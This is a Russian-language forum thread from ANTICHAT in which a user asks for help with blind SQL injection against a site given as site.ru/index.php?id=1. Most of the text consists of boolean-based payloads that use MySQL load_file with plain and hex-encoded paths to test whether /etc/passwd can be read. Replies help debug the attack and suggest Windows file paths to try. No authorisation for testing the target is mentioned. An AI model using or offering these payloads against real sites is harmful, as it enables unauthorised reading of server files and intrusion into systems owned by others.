ANTICHAT — форум по информационной безопасности, OSINT и технологиям

Проверяю данные запросы в консоли

SELECT 1 AND 1=if(load_file('/etc/passwd') is not NULL,1,2); Возвращает 1.

SELECT 1 AND 1=if(load_file('/etc/passwd') is NULL,1,2); Возвращает 0.

Но когда подставляю на сайте что в первом, что во втором случае отображается то же самое, что и при: site.ru/index.php?id=1

Но если делаю так: site.ru/index.php?id=1 and 1=0--+

Возвращает пустую страницу.

Это значит что нет прав на загрузку файла?

Может я что-то делаю не так?=\

может что-то не так. может кавычки у вас экранируются, может /etc/passwd блокирует WAF, или еще что-то. но результаты при этих запросах должны отличатся вне зависимости от того, есть права или нет.

Теперь такой запроc: AND 1=if(load_file(unhex(hex('/etc/passwd'))) is not NULL,1,2)--+ Возвращает пустую страницу.

Может сервер на винде...

yarbabin,Спасибо огромное за помощь буду дальше пытаться ковырять

и толку что вы спрятали слово в кавычках в хекс и анхекс? load_file(0x2f6574632f706173737764)

Но теперь хотя бы есть результат)

При таком запросе: AND 1=if(load_file(unhex(hex('/etc/passwd'))) is NULL,1,2)--+ отображается как и при site.ru/index.php?id=1

а при AND 1=if(load_file(unhex(hex('/etc/passwd'))) is not NULL,1,2)--+ пустая страница.

То же самое и при and 1=if(load_file(0x2f6574632f706173737764) is not NULL,1,2)--+

и

and 1=if(load_file(0x2f6574632f706173737764) is NULL,1,2)--+

просто под рукой сейчас нчего нет что в хекс кодирует строку)

and 1=1 TRUE

and 1=2 FALSE

Соответственно, load_file(unhex(hex('/etc/passwd')) возвращает null, у вас нет прав на чтение.

Это я понял. Просто думаю если серв на винде то путь другой будет. Сейчас времени нет тестить (не дома нахожусь).

Под вендой в консоли при запросе select 1 and 1=if(load_file('/etc/passwd') is not NULL,1,2); вернётся false так как такого пути не существует.

C:\boot.ini

C:\Windows\System32\drivers\etc\hosts